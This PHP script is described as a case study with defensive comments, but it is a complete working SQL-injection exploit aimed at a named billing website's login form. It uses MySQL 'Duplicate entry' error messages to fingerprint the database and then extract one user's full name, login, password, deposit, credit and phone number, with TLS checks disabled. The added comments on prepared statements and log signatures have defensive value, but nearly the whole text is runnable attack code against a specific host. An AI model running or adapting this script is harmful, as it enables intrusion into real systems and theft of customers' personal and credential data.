php set_time_limit false ignore_user_abort true site https billing zug

<?php
// Case-study listing: a script that extracts data from a billing login form
// through SQL injection. The comments describe what each step does and which
// server-side control would have stopped it.
//
// set_time_limit(false): false is coerced to 0, which removes PHP's execution
// time limit for this script.
set_time_limit(false);
// Keep running even if the client that started the script disconnects.
ignore_user_abort(true);
// Base URL that every request in query() is POSTed to.
$site = 'https://billing.zugres.net';
/**
 * Sends one POST request to $site with an SQL fragment placed in the `login`
 * form field, and returns the text found in a MySQL "Duplicate entry" error
 * in the response body.
 *
 * The `login` value closes a string literal with a single quote and appends a
 * grouped sub-select whose key is CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2)).
 * The script relies on the server answering with a "Duplicate entry '...'"
 * error message that contains that key, i.e. the first 63 characters of the
 * result of $query followed by one digit.
 *
 * Defensive reading: this only works if (a) the login handler builds its SQL
 * by concatenating the `login` field (presumably; the server code is not shown)
 * and (b) raw database error text is returned in the HTTP response. Bound
 * parameters / prepared statements remove (a); generic error pages with
 * server-side logging remove (b). Requests of this shape are visible in logs
 * as POSTs whose `login` field contains SQL keywords, and in responses that
 * contain the string "Duplicate entry".
 *
 * @param string $site  URL to POST to.
 * @param string $query SQL expression or sub-select interpolated into the `login` field.
 * @return mixed Capture group 1 of the regex match; $data[1] is not set when
 *               the response contains no "Duplicate entry" text (no check is made).
 */
function query($site, $query) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
// TLS host and peer verification are both switched off, so any certificate
// presented by the remote end is accepted.
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false
));
curl_setopt_array($ch, array(
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
// Random six-digit value; its role on the server side is not visible here.
'card' => rand(100000, 999999),
// $query is interpolated into this double-quoted string; MID(..., 1, 63)
// caps the extracted value at 63 characters per request.
'login' => "' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2))) -- '",
'password' => '',
'act' => '1'
)
));
//$res = iconv('koi8-r', 'UTF-8', curl_exec($ch));
// The return value of curl_exec() is not checked for failure and the handle
// is never closed in this function.
$res = curl_exec($ch);
// Capture the quoted text of the error message, dropping the single trailing
// digit that FLOOR(RAND(0)*2) appended to the grouping key.
preg_match('/Duplicate entry \'(.*?)\d\'/', $res, $data);
return $data[1];
}
// Driver section: each query() call below is one HTTP request returning one
// value. A run therefore shows up server-side as a burst of POSTs to the
// login endpoint from a single client, each with an SQL-bearing `login` field.

// Fingerprinting: current schema name, database account and server version.
$db = query($site, 'database()');
$user = query($site, 'user()');
$version = query($site, 'version()');
// Number of tables in the current schema, read from information_schema.
// The value returned for $db is concatenated into the next SQL string as-is.
$c_tables = query($site, 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\''.$db.'\'');
// Values taken from the remote response are echoed into HTML without escaping.
echo '<b>Host: </b> ' . $site . '<br/>';
echo '<b>Database: </b> ' . $db . '<br/>';
// Disabled output of the account, version and table count collected above.
//echo '<b>User: </b> ' . $user . '<br/>';
//echo '<b>MySQL Version: </b> ' . $version . '<br/>';
//echo '<b>Count tables: </b> ' . $c_tables . '<br/>';
// Disabled block: would list table names one request at a time via LIMIT $i,1.
/*echo '<b>Tables:</b><pre>' . "\n-----\n";
$tables = [];
for($i = 0; $i < $c_tables; $i++) {
$tables[] = query($site, 'SELECT table_name FROM information_schema.tables WHERE table_schema=\''.$db.'\' LIMIT '.$i.',1');
echo $tables[$i] . "\n";
}
echo '-----</pre>';*/
// Label text: "Number of users". Row count of the `users` table.
echo '<b>Количество юзеров:</b> ' . query($site, 'SELECT COUNT(*) FROM users') . '<br/>';
// Selects a single uid at row offset 100. Note the label printed on the next
// line says "99", which does not match the offset used here.
$uid = query($site, 'SELECT uid FROM users LIMIT 100,1'); // change the limit here; counting starts from 0
// Label text: "99 uid from users".
echo '<b>99 uid из users:</b> ' . $uid . '<br/>';
// From here on, one column per request is read for that uid: full name,
// login, password, deposit, credit and phone. These are personal and account
// data; the exposure is what least-privilege database accounts, parameterized
// queries and hashed password storage are meant to limit.
$fio = query($site, 'SELECT fio FROM users WHERE uid=\''.$uid.'\'');
// Label text: "His full name".
echo '<b>Его ФИО:</b> ' . $fio . '<br/>';
// Overwrites $user, which previously held the result of user().
$user = query($site, 'SELECT user FROM users WHERE uid=\''.$uid.'\'');
// Label text: "His login".
echo '<b>Его логин:</b> ' . $user . '<br/>';
// Reads the `password` column directly; whether it holds a hash or plaintext
// cannot be told from this listing.
$password = query($site, 'SELECT password FROM users WHERE uid=\''.$uid.'\'');
// Label text: "His password".
echo '<b>Его пароль:</b> ' . $password . '<br/>';
$deposit = query($site, 'SELECT deposit FROM users WHERE uid=\''.$uid.'\'');
echo '<b>deposit:</b> ' . $deposit . '<br/>';
$credit = query($site, 'SELECT credit FROM users WHERE uid=\''.$uid.'\'');
echo '<b>credit:</b> ' . $credit . '<br/>';
$phone = query($site, 'SELECT phone FROM users WHERE uid=\''.$uid.'\'');
echo '<b>phone:</b> ' . $phone . '<br/>';